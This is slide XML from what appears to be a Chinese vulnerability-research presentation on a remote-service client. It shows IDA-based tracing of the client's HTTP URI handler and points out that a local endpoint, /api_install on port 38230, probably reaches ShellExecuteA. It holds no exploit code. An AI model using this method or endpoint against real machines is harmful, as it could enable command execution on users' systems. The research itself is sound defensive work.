            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="图片 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD36FA5B-41DB-05B6-CEBD-D2A49FAD9B49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId6"/>
            <a:srcRect t="8317" b="55248"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9656231" y="4785690"/>
              <a:ext cx="1826079" cy="883489"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1696140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某远程服务平台客户端</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合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0093905-7F48-0976-4B9D-7003AE1951E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1175854" y="1682946"/>
            <a:ext cx="9840293" cy="4472177"/>
            <a:chOff x="671766" y="1706597"/>
            <a:chExt cx="10848468" cy="4930369"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D8DD93-5A8D-5354-C0EC-518A1FFAC212}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="684649" y="1706597"/>
              <a:ext cx="2905697" cy="1815882"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>由于调用函数较多，我们可以使用</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IDA</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>插件</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>CTO</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>来梳理调用关系，最终会发现字符串的上层调用函数最终都是被同一个函数</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>sub_674090</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>所调用，跟进分析可以看出该函数的作用就是对</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>HTTP</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>访问</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>URI</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的处理。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="组合 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34D9BA8D-FDC2-7701-1B7A-958EF9757A3F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="671766" y="1754038"/>
              <a:ext cx="10848468" cy="4882928"/>
              <a:chOff x="779904" y="1754038"/>
              <a:chExt cx="10848468" cy="4882928"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="17" name="图片 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17DEFED4-6D33-2579-A7D6-DB78F902AE8E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3925392" y="1754038"/>
                <a:ext cx="7702980" cy="1778965"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="文本框 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A54FC26-FF8A-43C3-5D7A-2254512B7184}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7013116" y="3778117"/>
                <a:ext cx="4615255" cy="830997"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr>
                  <a:defRPr kumimoji="1" sz="1600">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                    <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
                  <a:t>有了请求处理逻辑的入口，接下来我们就要去看每个URI对应的处理逻辑是什么，看一下处理的逻辑中是否有参数值可控导致存在的相关漏洞。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="19" name="图片 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0FDEB5E-BB83-83A8-2D10-E1A912D5C18D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="779904" y="3758691"/>
                <a:ext cx="2810443" cy="2866317"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="20" name="图片 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A9DC9FC-C7D0-762B-63A1-9202250C40EB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3919144" y="3764670"/>
                <a:ext cx="2643021" cy="2872296"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="23" name="图片 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7877192C-1A2C-BDAF-1B32-8D00474F12A6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7337010" y="4766195"/>
                <a:ext cx="3967466" cy="1858813"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118826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某远程服务平台客户端</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B4FB7F91-E333-741C-9DA0-D3988BD645AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="502251" y="1754925"/>
            <a:ext cx="11187499" cy="4434292"/>
            <a:chOff x="585501" y="2019768"/>
            <a:chExt cx="11187499" cy="4434292"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="图片 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{223FE28E-AC59-730A-D265-5041A542AACA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect l="48799"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="673652" y="2112702"/>
              <a:ext cx="2991568" cy="2165892"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="图片 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E510593-534E-3C22-4F5C-B7FEEEFF3903}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="585501" y="4961661"/>
              <a:ext cx="3248553" cy="1402619"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0536FAF-1E20-63AD-ED5E-C5C16B2C568C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4222979" y="4961661"/>
              <a:ext cx="3615567" cy="1355838"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="图片 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58FFB86B-37F0-D794-86AA-57B6AD1838A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8227471" y="4871880"/>
              <a:ext cx="3208661" cy="1582180"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="图片 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4164DD-FC94-6CAB-73B3-9DF3CC7B67E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId6"/>
            <a:srcRect t="5125" b="40531"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4192903" y="3126847"/>
              <a:ext cx="3009192" cy="1385209"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="图片 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C39F999-832E-EDAB-05A4-CC95EF5CED04}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7689437" y="3149900"/>
              <a:ext cx="4083563" cy="1385209"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="直线箭头连接符 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C53B21F1-2754-4F4B-C99F-DA94433F4FF5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2169719" y="4401238"/>
              <a:ext cx="0" cy="505014"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="直线箭头连接符 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4D5FFF7-23E5-22BC-EA13-87164167C0FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3860948" y="5628690"/>
              <a:ext cx="358849" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F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直线箭头连接符 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D6D3AD1-599E-DAE8-93A8-2F79CE0E5A79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7851993" y="5662970"/>
              <a:ext cx="358849" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="24" name="直线箭头连接符 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCBB37A8-42E3-2A98-1611-15D38C7F9006}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9791460" y="4585447"/>
              <a:ext cx="0" cy="238890"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="直线箭头连接符 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC3D923-7783-5AEE-2923-FCCB2320F7E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="7228989" y="3896292"/>
              <a:ext cx="375478" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="文本框 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFCAB66F-9DEB-504F-3148-6EFE8AFCAA0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4107933" y="2019768"/>
              <a:ext cx="7665067" cy="1077218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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逐个</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>URI</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>处理跟进比较繁琐，也可以基于</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>CTO</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>插件查看调用链中是否存在敏感函数，如图所示，访问URL：http://127.0.0.1:38230/api_install时很有可能就会触发ShellExecuteA函数。再根据代码及赋值关系，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>即可知道该</a:t>
              </a:r>
              <a:r>
